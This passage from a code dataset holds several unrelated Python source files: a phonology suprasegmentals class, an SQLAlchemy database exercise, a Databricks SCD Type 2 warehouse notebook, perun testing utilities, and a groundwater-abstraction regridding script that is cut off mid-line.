self.marks.get(symbol) and part == symbol:\n matching_parts.append(part)\n continue\n did_match = False\n return False # no match\n\n def get_mark(self, mark_id):\n return self.marks[mark_id]\n\n def add_syllabification(self, word_id, syllabification=None, do_syllabify=False):\n syllabification = self.syllabify(word_id[0]) if do_syllabify else syllabification\n if syllabification and word_id not in self.syllabifications:\n self.syllabifications[word_id] = syllabification\n return self.syllabifications[word_id]\n\n def update_syllabification(self, word_id, syllabification):\n if word_id not in self.syllabifications:\n return\n self.syllabifications[word_id] = syllabification\n return self.syllabifications[word_id]\n \n def remove_syllabification(self, word_id):\n return self.syllabifications.pop(word_id, None)\n\n def add_default_contour(self, name, mark=\"\", conditioning_mark=None, offset=None, chain=None, overwrite=False):\n if not overwrite and name in self.default_contours:\n return\n \n # expect offset to be [syllable_index, symbol_index] pair\n if offset and (len(offset) != 2 or False in [isinstance(n, int) for n in offset]):\n return\n\n self.default_contours[name] = {\n 'condition': conditioning_mark, # assume word start/end if None\n 'mark': mark, # mark applied to letter\n 'offset': offset, # offset from compared mark/boundary\n 'chain': chain # default contour name to apply next\n }\n return name\n \n def get_default_contour(self, name):\n return self.default_contours.get(name)\n\n def update_default_contour(self, name, mark=None, conditioning_mark=None, offset=None, chain=None):\n contour = self.remove_default_contour(name)\n if not contour:\n return\n return self.add_default_contour(\n name,\n mark = mark if mark else contour['mark'],\n conditioning_mark = conditioning_mark if conditioning_mark else contour['condition'],\n offset = offset if offset else contour['offset'],\n chain = chain if chain else contour['chain'],\n overwrite = True\n )\n\n def remove_default_contour(self, name):\n return self.default_contours.pop(name, None)\n\n def flat_count(self, nested_list, value=None, index=None, offset=1):\n \"\"\"Count offset number of values in a list of lists disregarding depth, then\n return the nested index of that offset value. The offset is calculated from\n either the given index tuple positioning (outer_list_index, inner_list_index)\n or instead from the first instance of a value if one is supplied.\"\"\"\n # expect a tuple with outer, inner list indexes\n if index and (len(index) != 2 or False in [isinstance(n, int) for n in index]):\n print(f\"Failed to flat count nested list - expected index (int, int) not {index}\")\n return\n # flat count up to offset\n count = 0\n identified_compared_value = False\n # build outer, inner list indexes from first occurrence of given value\n if value:\n first_list_with_value = next(l for l in nested_list if value in l)\n outer_i = nested_list.index(first_list_with_value)\n inner_i = first_list_with_value.index(value)\n index = (outer_i, inner_i)\n # if offset is negative, do reverse look\n outer_list = reversed(nested_list) if offset < 0 else nested_list\n for i, l in enumerate(outer_list, index[0]):\n inner_list = reversed(l) if offset < 0 else l\n for j, inner_value in enumerate(inner_list):\n if identified_compared_value:\n if count == offset:\n return (i, j)\n count += 1\n elif (i, j) == index:\n identified_compared_value = True\n return ()\n\n def apply_default_contour(self, syllables, name):\n contoured = [None for syllable in syllables for symbol in syllable]\n contour = self.default_contours[name]\n \n # TODO: interpet attributes and calc mark position(s)\n # - if offset is falsy and only mark is supplied, apply it everywhere\n # - mark from start or end\n # - mark from offset from conditioner\n # - if chain then apply next (or have plural apply do this)\n if not contour['offset']: # TODO: no need to check for condition or start?\n contoured = [\n contour['mark']\n for syllable in contoured\n for mark in syllable\n ]\n # mark from another symbol\n elif contour['condition']:\n # grab indexes where conditioner appears\n compared_indexes = [\n (i, j)\n for i, syllable in enumerate(contoured)\n for j, compared_mark in enumerate(syllable)\n if compared_mark == contour['condition']\n ]\n # add mark forwards/backwards from conditioners\n for compared_index in compared_indexes:\n mark_index = self.flat_count(contoured, index=compared_index, offset=contour['offset'])\n contoured[mark_index[0]][mark_index[1]] = contour['mark']\n # mark from word start or end\n else:\n # count forwards/backwards from boundary and mark\n mark_index = self.flat_count(contoured, index=(0, 0), offset=contour['offset'])\n contoured[mark_index[0]][mark_index[1]] = contour['mark']\n \n # TODO: check for circular chain (do in plural method)\n next_contour = contour['chain']\n\n return (contoured, next_contour)\n\n # TODO: complete contours and compare to current hardcoded single-syll/char values\n # - can be use to check environment marks or to apply changes\n # - if useful enough structure the whole class around contours\n # EXs: Gk clitic tonoi, J pitch accent, Zh tone interactions, movable stress, ...\n # \n # TODO: allow setting default patterns like always high-pitch final syllable \n #\n def add_contour(self, word_id, syllabified_word=None, contour=None, do_syllabify=False, default_contour=False):\n # example_contour = [[], [], [None, 'high'], []]\n if not isinstance(word_id, (list, tuple)) or len(word_id) != 2 or not isinstance(word_id[0], str) or not isinstance(word_id[1], int):\n return\n if not contour or not isinstance(contour, (list, tuple)):\n return\n if not do_syllabify and (not syllabified_word or len(syllabified_word) != syllabified_word):\n return\n #\n # TODO: create a default contour\n # default_contour = []\n syllabified_word = self.phonology.syllables.syllabify(word_id[0]) if do_syllabify else syllabified_word\n # check contour\n if len(contour) > len(syllabified_word):\n return\n # TODO: format contour entry\n self.contours.setdefault(word_id, (syllabified_word, contour))\n return self.contours.get(word_id)\n # TODO: mark letters in syllables\n def apply_contour(self, word_id):\n syllabification = self.syllabifications[word_id][:]\n contour = self.contours[word_id]\n for syllable, i in enumerate(syllabification):\n syllable_marks = contour[i][:]\n current_marked = 0\n for c, j in enumerate(syllable):\n if c in self.diacritics:\n syllabification[i][j] = self.diacritics[syllable_marks[current_marked]][c]\n current_marked += 1\n # TODO: instead apply syllable-wide mark to beginning/end of syll\n if not current_marked >= len(syllable_marks):\n # FAILED to apply all marks to syllable; syllable doesn't match contour?\n return\n return syllabification\n # TODO: keep track of syllable added/removed\n def track_contour_changes(self, word_id):\n syllabification = self.syllabifications[word_id]\n syllable_ids = [i for i in range(len(syllabification))]\n def update_contour():\n # add/remove/adjust syllable ids\n return syllable_ids\n return update_contour\n\n def is_syllabified(self, word):\n \"\"\"Check for a syllabified word containing a list of syllable lists each\n containing sound strings\"\"\"\n # is a list\n if not isinstance(word, (tuple, list)):\n return False\n # is a list of syllable lists\n for syllable in word:\n if not isinstance(syllable, (tuple, list)):\n return False\n # is a sound string\n for sound in syllable:\n if not isinstance(sound, str) or not self.phonology.has_sound(sound):\n return False\n return True\n\n def map_diacritic(self, diacritic, symbol, modified_symbol, is_spelling=False):\n diacritics = self.diacritic_spellings if is_spelling else self.diacritic_sounds\n diacritics.setdefault(diacritic, {})\n diacritics[diacritic][symbol] = modified_symbol\n return diacritics[diacritic]\n def unmap_diacritic(self, diacritic, symbol, is_spelling=False):\n diacritics = self.diacritic_spellings if is_spelling else self.diacritic_sounds\n return diacritics[diacritic].pop(symbol, None)\n def remove_diacritic(self, diacritic, is_spelling=False):\n diacritics = self.diacritic_spellings if is_spelling else self.diacritic_sounds\n return diacritics.pop(diacritic, None)\n\n # TODO: sound changes, shifts?\n def apply_marks(self, word_id, as_string=False, is_spelling=False):\n \"\"\"Build a representation of a word's sounds with diacritics and syllable marks\"\"\"\n word_details = self.marked_words.get(word_id)\n if not word_details:\n return\n syllabification = word_details['syllabification'][:]\n marked_syllables = {}\n marks = word_details['marks']\n for mark_id in marks:\n mark = self.marks.get(mark_id)\n if not mark:\n continue\n symbol = mark['symbol']\n if not mark['sound']:\n marked_syllables.setdefault(3, set()).add(symbol)\n # add/alter character marks\n diacritics = self.diacritic_spellings if is_spelling else self.diacritic_sounds\n modified_symbol = diacritics[symbol][syllabification[mark['syllable']][mark['sound']]]\n syllabification[mark['syllable']][mark['sound']] = modified_symbol\n # prepend syllable marks\n for syllable_n, syllable_mark in collections.OrderedDict(marked_syllables).items():\n syllabification[syllable_n] = [syllable_mark] + syllabification[syllable_n]\n # flatten into list of symbols\n resulting_symbols = [\n syllable_symbol for syllable_list in syllabification\n for syllable_symbol in syllable_list\n ]\n if as_string:\n return \"\".join(resulting_symbols)\n return resulting_symbols\n\n # TODO: split marking word from adding mark\n def add_mark(self, vocabulary_item, syllabified_word=None, symbol=\"\", is_diacritic=True, pitch=None, stress=None, target_syllable=0, target_sound=None, do_syllabify=False):\n \"\"\"Mark a single word on a specific syllable, optionally a specific sound\n within that syllable\"\"\"\n # expect headword structure to match vocabulary (word, index) pair\n if not len(vocabulary_item) == 2 and isinstance(vocabulary_item[0], str) and isinstance(vocabulary_item[1], int):\n print(f\"Suprasegmentals failed to add mark - invalid vocabulary item {vocabulary_item}\")\n return\n\n # allow targeted syllable without specific targeted sound\n if not isinstance(target_sound, int):\n target_sound = None\n\n # make or check useful syllabification\n if do_syllabify:\n syllabified_word = self.syllabify(vocabulary_item[0])\n if not syllabified_word or not self.is_syllabified(syllabified_word):\n print(f\"Suprasegmentals failed to add mark - unrecognized syllabified word {syllabified_word}\")\n return\n\n if is_diacritic and not self.diacritics.get(symbol):\n print(f\"Supgrasegmentals failed to mark {vocabulary_item} - unrecognized diacritic {symbol}\")\n return\n # TODO: otherwise place where with respect to each syllable - above? before?\n\n # TODO: combining symbol mapping\n # TODO: vet characteristicts (symbol, pitch, stress)\n\n mark_id = f\"mark-{uuid4()}\"\n added_mark = {\n 'symbol': symbol,\n 'diacritic': is_diacritic,\n 'pitch': pitch,\n 'stress': stress,\n 'syllable': target_syllable,\n 'sound': target_sound\n }\n self.marks[mark_id] = added_mark\n self.marked_words.setdefault(vocabulary_item, {\n 'syllabification': syllabified_word,\n 'marks': set()\n })['marks'].add(mark_id)\n self.marked_words[syllabified_word]\n return self.get_mark(mark_id)\n \n def update_mark(self, mark_id):\n return\n def remove_mark(self, mark_id):\n return\n\n def render_marks(self, marked_word):\n return\n\n def move(self, word_id, mark_id, syllable_target):\n \"\"\"Move the targeted mark to a new syllable\"\"\"\n return\n\n ","repo_name":"Botmasher/syllables-names-generator","sub_path":"languagebuilder/phonology/suprasegmentals.py","file_name":"suprasegmentals.py","file_ext":"py","file_size_in_byte":18861,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"91"}
+{"seq_id":"18389270163","text":"#!/usr/bin/python3\n\"\"\"\nscript that prints the first State object from the database hbtn_0e_6_usa\n\n - script take 3 arguments: mysql username, mysql password and database name\n - uses the module SQLAlchemy\n - import State and Base from model_state\n - script connects to a MySQL server running on localhost at port 3306\n - The state you display must be the first in states.id\n - You are not allowed to fetch all states from the database\n before displaying the result\n - If the table states is empty, print 'Nothing' followed by a new line\n\"\"\"\n\nif __name__ == '__main__':\n import sys\n from sqlalchemy import create_engine\n from sqlalchemy.orm import sessionmaker\n from model_state import Base, State\n\n engine = create_engine('mysql+mysqldb://{}:{}@localhost/{}'\n .format(sys.argv[1], sys.argv[2], sys.argv[3]))\n Session = sessionmaker(bind=engine)\n s = Session()\n\n if not s.query(State).first():\n print(\"Nothing\")\n else:\n row = (s.query(State).first())\n print('{}: {}'.format(row.id, row.name))\n","repo_name":"tcrz/alx-higher_level_programming","sub_path":"0x0F-python-object_relational_mapping/8-model_state_fetch_first.py","file_name":"8-model_state_fetch_first.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"91"}
+{"seq_id":"8090142491","text":"# Databricks notebook source\n# MAGIC %run \"lirkov/IT Job Boards/Main\"\n\n# COMMAND ----------\n\n# DBTITLE 1,Imports\nfrom pyspark.sql import Window\nfrom delta.tables import *\n\n# COMMAND ----------\n\n# DBTITLE 1,Define variables\n# Date variables \ncurrent_year = date.today().year\ncurrent_month = \"0\" + str(date.today().month) if len(str(date.today().month)) == 1 else date.today().month\ncurrent_day = \"0\" + str(date.today().day) if len(str(date.today().day)) == 1 else date.today().day\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## Create DimActivities\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ### Read data\n\n# COMMAND ----------\n\n# Read base\ndf_activities_noblehire_base = spark.read.format(\"parquet\").load(f\"/mnt/adlslirkov/it-job-boards/Noblehire.io/base/jobActivities/{current_year}/{current_month}/{current_day}/\")\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ### Prepare data\n\n# COMMAND ----------\n\n# Select and rename columns\ndf_activities_noblehire_enriched = (\n df_activities_noblehire_base\n .select(\n col(\"id\").alias(\"ActivitiesId\"),\n col(\"Source\").alias(\"SourceSystem\"),\n col(\"activities_0_timePercents\").cast(\"int\").alias(\"ActivitiesTimePercent0\"),\n col(\"activities_0_title\").alias(\"Activities0\"),\n col(\"activities_1_timePercents\").cast(\"int\").alias(\"ActivitiesTimePercent1\"),\n col(\"activities_1_title\").alias(\"Activities1\"),\n col(\"activities_2_timePercents\").cast(\"int\").alias(\"ActivitiesTimePercent2\"),\n col(\"activities_2_title\").alias(\"Activities2\"),\n col(\"activities_3_timePercents\").cast(\"int\").alias(\"ActivitiesTimePercent3\"),\n col(\"activities_3_title\").alias(\"Activities3\"),\n col(\"activities_4_timePercents\").cast(\"int\").alias(\"ActivitiesTimePercent4\"),\n col(\"activities_4_title\").alias(\"Activities4\"),\n col(\"activities_5_timePercents\").cast(\"int\").alias(\"ActivitiesTimePercent5\"),\n col(\"activities_5_title\").alias(\"Activities5\"),\n col(\"activities_6_timePercents\").cast(\"int\").alias(\"ActivitiesTimePercent6\"),\n col(\"activities_6_title\").alias(\"Activities6\"),\n col(\"IngestionDate\")\n )\n)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## SCD Type 2 Setup\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC The following commands are used for the initial setup of the delta table\n\n# COMMAND ----------\n\n# DBTITLE 1,Add SCD Type 2 Columns to Delta Table\ndf_activities_noblehire_enriched = (\n df_activities_noblehire_enriched\n .withColumn(\"IsActive\", lit(True))\n .withColumn(\"StartDate\", date_format(current_timestamp(), \"yyyy-MM-dd HH:mm:ss\"))\n .withColumn(\"EndDate\", lit(None).cast(StringType()))\n)\n\n# COMMAND ----------\n\n# DBTITLE 1,Populate Delta Table, if empty\ndf_activities_noblehire_enriched.createOrReplaceTempView(\"Temp_DimActivities\")\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC \n# MAGIC INSERT INTO WAREHOUSE.DimActivities (\n# MAGIC ActivitiesId, \n# MAGIC SourceSystem, \n# MAGIC ActivitiesTimePercent0, \n# MAGIC Activities0,\n# MAGIC ActivitiesTimePercent1,\n# MAGIC Activities1, \n# MAGIC ActivitiesTimePercent2,\n# MAGIC Activities2, \n# MAGIC ActivitiesTimePercent3,\n# MAGIC Activities3, \n# MAGIC ActivitiesTimePercent4,\n# MAGIC Activities4, \n# MAGIC ActivitiesTimePercent5,\n# MAGIC Activities5, \n# MAGIC ActivitiesTimePercent6,\n# MAGIC Activities6, \n# MAGIC IngestionDate, \n# MAGIC IsActive, \n# MAGIC StartDate, \n# MAGIC EndDate\n# MAGIC )\n# MAGIC SELECT * FROM Temp_DimActivities\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## SCD Type 2 Logic\n\n# COMMAND ----------\n\n# DBTITLE 1,Create Temp Staging Table\n# Create the Source Data Frame\nsourceDF = df_activities_noblehire_enriched\nsourceDF.display()\nprint(\"Count: {}\".format(sourceDF.count()))\n\n# COMMAND ----------\n\n# DBTITLE 1,Create Delta Table Instance\ndeltaJobActivities = DeltaTable.forPath(spark, \"/mnt/adlslirkov/it-job-boards/Warehouse/DimActivities\")\n\ntargetDF = deltaJobActivities.toDF()\ntargetDF.display()\n\n# COMMAND ----------\n\n# DBTITLE 1,Join source and target\ntargetDF = targetDF.filter(col(\"IsActive\") == True).select(*[c for c in targetDF.columns if c not in [\"IsActive\", \"StartDate\", \"EndDate\"]])\n\n\njoinDF = (\n sourceDF\n .join(\n targetDF, \n (sourceDF.ActivitiesId == targetDF.ActivitiesId),\n# & (targetDF.IsActive == \"true\"),\n \"outer\"\n )\n .select(\n sourceDF[\"*\"],\n targetDF.ActivitiesId.alias(\"target_ActivitiesId\"),\n targetDF.SourceSystem.alias(\"target_SourceSystem\"),\n targetDF.ActivitiesTimePercent0.alias(\"target_ActivitiesTimePercent0\"),\n targetDF.Activities0.alias(\"target_Activities0\"),\n targetDF.ActivitiesTimePercent1.alias(\"target_ActivitiesTimePercent1\"),\n targetDF.Activities1.alias(\"target_Activities1\"),\n targetDF.ActivitiesTimePercent2.alias(\"target_ActivitiesTimePercent2\"),\n targetDF.Activities2.alias(\"target_Activities2\"),\n targetDF.ActivitiesTimePercent3.alias(\"target_ActivitiesTimePercent3\"),\n targetDF.Activities3.alias(\"target_Activities3\"),\n targetDF.ActivitiesTimePercent4.alias(\"target_ActivitiesTimePercent4\"),\n targetDF.Activities4.alias(\"target_Activities4\"),\n targetDF.ActivitiesTimePercent5.alias(\"target_ActivitiesTimePercent5\"),\n targetDF.Activities5.alias(\"target_Activities5\"),\n targetDF.ActivitiesTimePercent6.alias(\"target_ActivitiesTimePercent6\"),\n targetDF.Activities6.alias(\"target_Activities6\"),\n targetDF.IngestionDate.alias(\"target_IngestionDate\")\n )\n)\n\njoinDF.display()\n\n# COMMAND ----------\n\n# DBTITLE 1,Hash source and target columns and compare them\nfilterDF = joinDF.filter(xxhash64(*[c for c in joinDF.columns if c.startswith(\"target\") == False and \"IngestionDate\" not in c]) != xxhash64(*[c for c in joinDF.columns if c.startswith(\"target\") == True and \"IngestionDate\" not in c])).withColumn(\"MergeKey\", col(\"target_ActivitiesId\"))\n\nfilterDF.display()\n\n# COMMAND ----------\n\n# DBTITLE 1,Add MergeKey and set it to null where Id is not null\ndummyDF = filterDF.filter(col(\"target_ActivitiesId\").isNotNull()).withColumn(\"MergeKey\", lit(None))\n\ndummyDF.display()\n\n# COMMAND ----------\n\n# DBTITLE 1,Union DFs\nscdDF = filterDF.union(dummyDF)\n\nscdDF.display()\n\n# COMMAND ----------\n\n# DBTITLE 1,Merge\n(deltaJobActivities.alias(\"target\")\n .merge(\n scdDF.alias(\"source\"),\n \"target.ActivitiesId = source.MergeKey\"\n )\n .whenMatchedUpdate(set = \n {\n \"SourceSystem\": \"'Noblehire.io'\",\n \"IsActive\": \"'False'\", \n \"EndDate\": \"date_format(current_timestamp(), 'yyyy-MM-dd HH:mm:ss')\"\n }\n )\n .whenNotMatchedInsert(\n condition = \"source.ActivitiesId IS NOT NULL\",\n values =\n {\n \"ActivitiesId\": \"source.ActivitiesId\",\n \"SourceSystem\": \"source.SourceSystem\",\n \"ActivitiesTimePercent0\": \"source.ActivitiesTimePercent0\",\n \"Activities0\": \"source.Activities0\",\n \"ActivitiesTimePercent1\": \"source.ActivitiesTimePercent1\",\n \"Activities1\": \"source.Activities1\",\n \"ActivitiesTimePercent2\": \"source.ActivitiesTimePercent2\",\n \"Activities2\": \"source.Activities2\",\n \"ActivitiesTimePercent3\": \"source.ActivitiesTimePercent3\",\n \"Activities3\": \"source.Activities3\",\n \"ActivitiesTimePercent4\": \"source.ActivitiesTimePercent4\",\n \"Activities4\": \"source.Activities4\",\n \"ActivitiesTimePercent5\": \"source.ActivitiesTimePercent5\",\n \"Activities5\": \"source.Activities5\",\n \"ActivitiesTimePercent6\": \"source.ActivitiesTimePercent6\",\n \"Activities6\": \"source.Activities6\",\n \"IngestionDate\": \"source.IngestionDate\",\n \"IsActive\": \"'True'\",\n \"StartDate\": \"current_timestamp\",\n \"EndDate\": \"\"\"to_date('9999-12-31 00:00:00.0000', 'MM-dd-yyyy HH:mm:ss')\"\"\"\n }\n )\n .execute()\n)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ## Data Quality Checks\n\n# COMMAND ----------\n\n# DBTITLE 1,Check Delta Table History\ndeltaJobActivities.history().display()\n\n# COMMAND ----------\n\n# DBTITLE 1,Compare Delta Table records with records in the Source DataFrame\n# Read delta table into DataFrame\ndeltaFinal = DeltaTable.forPath(spark, \"/mnt/adlslirkov/it-job-boards/Warehouse/DimActivities\")\nfinalTargetDF = deltaFinal.toDF()\n\n# Raise error if there are records in the delta table (when filtered to show only active records), which do not exists in the source DataFrame\ntargetExceptSourceCount = finalTargetDF.where(col(\"IsActive\") == True).select(\"ActivitiesId\").exceptAll(sourceDF.select(\"ActivitiesId\")).count()\ntargetEqualsSourceCount = finalTargetDF.where(col(\"IsActive\") == True).count() == sourceDF.count()\n\nif targetExceptSourceCount > 0 or targetEqualsSourceCount == False:\n raise Exception(\"There are records in source, which do not exist in target.\")\n","repo_name":"lyubol/WebScraping","sub_path":"Bulgarian IT Job Boards/Warehouse/DimActivities (SCD2).py","file_name":"DimActivities (SCD2).py","file_ext":"py","file_size_in_byte":8879,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"2596178029","text":"import os\nimport shutil\n\nimport perun.logic.store as store\nimport perun.utils.streams as streams\nimport perun.logic.index as index\n\n__author__ = 'Tomas Fiedor'\n\n\ndef profile_filter(generator, rule, return_type='prof'):\n \"\"\"Finds concrete profile by the rule in profile generator.\n\n :param generator generator: stream of profiles as tuple: (name, dict)\n :param str rule: string to search in the name\n :param str return_type: return type of the profile filter (either prof or name)\n :returns kProfile: first profile with name containing the rule\n \"\"\"\n # Loop the generator and test the rule\n for profile in generator:\n if rule in profile[0]:\n if return_type == 'prof':\n return profile[1]\n elif return_type == 'name':\n return profile[0]\n\n\ndef index_filter(file):\n \"\"\"Index filtering function\n\n :param str file: name of the file\n :return: true if the file is not index\n \"\"\"\n return file != '.index'\n\n\ndef populate_repo_with_untracked_profiles(pcs_path, untracked_profiles):\n \"\"\"\n Populates the jobs directory in the repo by untracked profiles\n\n Arguments:\n pcs_path(str): path to PCS\n untracked_profiles(list): list of untracked profiles to be added to repo\n \"\"\"\n jobs_dir = os.path.join(pcs_path, 'jobs')\n for valid_profile in untracked_profiles:\n shutil.copy2(valid_profile, jobs_dir)\n\n\ndef prepare_profile(dest_dir, profile, origin):\n \"\"\"\n Arguments:\n dest_dir(str): destination of the prepared profile\n profile(str): name of the profile that is going to be stored in pending jobs\n origin(str): origin minor version for the given profile\n \"\"\"\n # Copy to jobs and prepare origin for the current version\n shutil.copy2(profile, dest_dir)\n\n # Prepare origin for the current version\n copied_filename = os.path.join(dest_dir, os.path.split(profile)[-1])\n copied_profile = store.load_profile_from_file(copied_filename, is_raw_profile=True)\n copied_profile['origin'] = origin\n streams.store_json(copied_profile.serialize(), copied_filename)\n shutil.copystat(profile, copied_filename)\n return copied_filename\n\n\ndef exists_profile_in_index_such_that(index_handle, pred):\n \"\"\"Helper assert to check, if there exists any profile in index such that pred holds.\n\n Arguments:\n index_handle(file): handle for the index\n pred(lambda): predicate over the index entry\n \"\"\"\n for entry in index.walk_index(index_handle):\n if pred(entry):\n return True\n return False\n\n\ndef open_index(pcs_path, minor_version):\n \"\"\"Helper function for opening handle of the index\n\n This encapsulates obtaining the full path to the given index\n\n Arguments:\n pcs_path(str): path to the pcs\n minor_version(str): sha minor version representation\n \"\"\"\n assert store.is_sha1(minor_version)\n object_dir_path = os.path.join(pcs_path, 'objects')\n\n _, minor_version_index = store.split_object_name(object_dir_path, minor_version)\n return open(minor_version_index, 'rb+')\n\n\ndef count_contents_on_path(path):\n \"\"\"Helper function for counting the contents of the path\n\n Arguments:\n path(str): path to the director which we will list\n\n Returns:\n (int, int): (file number, dir number) on path\n \"\"\"\n file_number = 0\n dir_number = 0\n for _, dirs, files in os.walk(path):\n for __ in files:\n file_number += 1\n for __ in dirs:\n dir_number += 1\n return file_number, dir_number\n\n\ndef compare_results(expected, actual, eps=0.0001):\n \"\"\"Compare two float values with eps tolerance.\n\n Arguments:\n expected(float): the expected result value\n actual(float): the actual result value\n eps(float): the tolerance value\n Returns:\n None\n \"\"\"\n assert abs(abs(expected) - abs(actual)) < eps\n\n\ndef generate_models_by_uid(profile, value, uid_sequence, key='model'):\n \"\"\"Provides computed models results for each uid in the specified uid sequence.\n\n Arguments:\n profile(Profile): the whole profile with 'models' results\n value(str): the specification of value of given key for matching models\n uid_sequence(list of str): list of uid values to search for\n key(str): the key for matching models\n Returns:\n generator: stream of lists with models dictionaries according to uid sequence\n \"\"\"\n models = profile['profile']['models']\n for uid in uid_sequence:\n yield [m for m in models if m['uid'] == uid and m[key] == value]","repo_name":"tfiedor/perun","sub_path":"perun/testing/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4593,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"91"}
+{"seq_id":"24619619517","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Feb 14 11:56:56 2020\n\n@author: engelen\n\"\"\"\n\nfrom delta_aquifer import geometry as gm\nimport xarray as xr\nimport rasterio as rio\nimport geopandas as gpd\nfrom create_inputs import create_geo_inputs as cgi\nfrom shapely.geometry import Polygon\nimport pandas as pd\nfrom imod.prepare import spatial as spat\nfrom imod.prepare import Regridder\nimport imod\nimport numpy as np\n\nimport os\nfrom pkg_resources import resource_filename\n\ndef assign_i_coordinate(da, dim, i_dim):\n \"\"\"Assign dependent index coordinate to keep track of row or column nrs in\n selections\n \n da : DataArray\n \n dim : string\n dimension\n \n i_dim : string\n name of new index coordinate\n \n \"\"\"\n \n i_coord = np.arange(len(da[dim]))\n i_coord = xr.DataArray(i_coord, coords=da[dim].coords)\n coords = {i_dim : i_coord}\n return(da.assign_coords(**coords))\n\ndef calc_ddim(da, dim):\n shifts = {dim : 1}\n ddim = da[dim] - da[dim].shift(**shifts)\n ddim[0] = ddim[1]\n return(ddim)\n\ndef get_gcps_coords(L_a, phi_f):\n r = np.array([0., L_a, L_a, L_a])\n phi = np.array([0., -phi_f/2, 0, phi_f/2])\n return(gm._pol2cart(r, phi))\n\ndef get_targgrid(dcell, L_a, phi_f, da):\n \"\"\"Modified version of the function in gm.get_targgrid\n In this function we compensate for when the regridded DataArrays are larger \n than targgrid calculated by gm.get_targgrid\n \n \"\"\"\n targgrid = {}\n targgrid[\"x\"], targgrid[\"y\"] = gm.get_targgrid(dcell, dcell, \n L_a, phi_f/2)\n \n x_max = np.max([da[\"xt\"].max().values, np.max(targgrid[\"x\"])])\n y_max = np.max([da[\"yt\"].max().values, np.max(targgrid[\"y\"])])\n y_min = np.min([da[\"yt\"].min().values, np.min(targgrid[\"y\"])]) \n \n x_max = gm._round2cell(x_max, dcell) + 0.5*dcell\n x_out = np.arange(0.5 * dcell, x_max+1, dcell)\n y_max = gm._round2cell(y_max, dcell) + 0.5*dcell\n y_min = gm._round2cell(y_min, dcell) - 0.5*dcell\n y_out = np.arange(y_min, y_max+1, dcell)\n return(np.meshgrid(x_out, y_out))\n \n \n\n#%%Path management\n#Path to annual groundwater abstractions data here. File too large to incorporate in git repo now\npath_ann_abs = r\"g:\\Global_Data\\PCR-GLOB_output\\2019\\totalGroundwaterAbstraction_annuaTot_output.nc\"\npath_2D_nc = os.path.join(path_ann_abs, \"..\", \"totalGroundwaterAbstraction_{}.nc\")\n\ndatafol = os.path.abspath(resource_filename(\"delta_aquifer\", os.path.join(\"..\", \"data\", \"30_deltas\")))\npath_shp = os.path.join(datafol, \"geometry\", \"delta_points.shp\")\npath_gm = os.path.join(datafol, \"geometry.csv\")\n\nfolder_out = os.path.join(datafol, \"abstractions\")\n\n#%%Options\nsave_2D_nc = False #Save seperate rasters\n\n#%%Constants\ndeg2Rad = np.pi/180.\n\n#%%Read\nprint(\"...reading...\")\nds = xr.open_dataset(path_ann_abs)\npoints = gpd.read_file(path_shp).drop(columns = [\"id\"])\npoints = points[points[\"Type\"] != \"shelf\"]\ngeom = pd.read_csv(path_gm, index_col=0).set_index(\"Delta\")\n\n#%%For easy checking NetCdfs in qgis:\nif save_2D_nc:\n years = ds.time.values.astype('datetime64[Y]').astype(int) + 1970\n \n for i, year in enumerate(years):\n ds.isel(time=i).to_netcdf(path_2D_nc.format(year))\n\n#%%Convert to polygons\ndeltas = points[\"Delta\"].unique()\n\ndf = pd.DataFrame(index = deltas, columns = [\"L_a\", \"phi_f\", \"azi_mid\", \"dist_mid\", \"geometry\"])\n\nfor delta in deltas:\n dist, azi = cgi.get_azi_and_distance(points, delta)\n df.loc[delta, \"L_a\"] = np.average(dist)\n df.loc[delta, \"phi_f\"] = cgi.calculate_phi_f(azi)\n df.loc[delta, \"azi_mid\"] = np.sort(cgi.azi_to_angle(azi))[1]\n df.loc[delta, \"dist_mid\"] = np.sort(dist)[1]\n df.loc[delta, \"geometry\"] = Polygon(cgi.sel_delta(points, delta)[\"geometry\"].values)\n\ngdf = gpd.GeoDataFrame(df, geometry=\"geometry\")\ngdf[\"geometry\"] = gdf[\"geometry\"].convex_hull #Fix polygons if constructed with points in the wrong order\n\n#%%Prepare for iMOD-Python prepare\n#rasterize wants the x dimension to be named \"x\".\nrnm = {\"longitude\" : \"x\", \"latitude\" : \"y\"}\nds = ds.rename(rnm)\n\n#Assign cellwidths so that iMOD-python can interpret the non-equidistant grid\ncoords = {\"dy\" : calc_ddim(ds, \"y\"),\n \"dx\" : calc_ddim(ds, \"x\")}\nds = ds.assign_coords(coords=coords)\n\n#%%Select all deltas with bound boxes to reduce data\nbnds = gdf[\"geometry\"].bounds #long live this attribute\n#Enlarge the bounding box with one cell on each side.\nbnds[\"minx\"] -= np.max(ds.dx).values\nbnds[\"maxx\"] += np.max(ds.dx).values\nbnds[\"miny\"] += np.min(ds.dy).values #dlatitude is negative\nbnds[\"maxy\"] -= np.min(ds.dy).values\n\nvar = \"total_groundwater_abstraction\"\nds[var] = ds[var].fillna(0.0)\nds = ds.assign_coords(time = pd.to_datetime(ds.time.values).year)\n\ndas = dict([(delta, ds[var].sel(x = slice(b[\"minx\"], b[\"maxx\"]),\n y = slice(b[\"maxy\"], b[\"miny\"]))\n ) for delta, b in bnds.iterrows()])\n\n\n#%%Regrid\nprint(\"...regridding...\")\nre_das = {}\n \nfor delta, da in das.items():\n x = np.arange(bnds.loc[delta][\"minx\"], bnds.loc[delta][\"maxx\"], step=0.0083333336)\n y = np.arange(bnds.loc[delta][\"maxy\"], bnds.loc[delta][\"miny\"], step=-0.0083333336)\n like = xr.DataArray(None, coords={\"x\" : x, \"y\" : y}, \n dims=[\"x\", \"y\"])\n \n re_das[delta] = 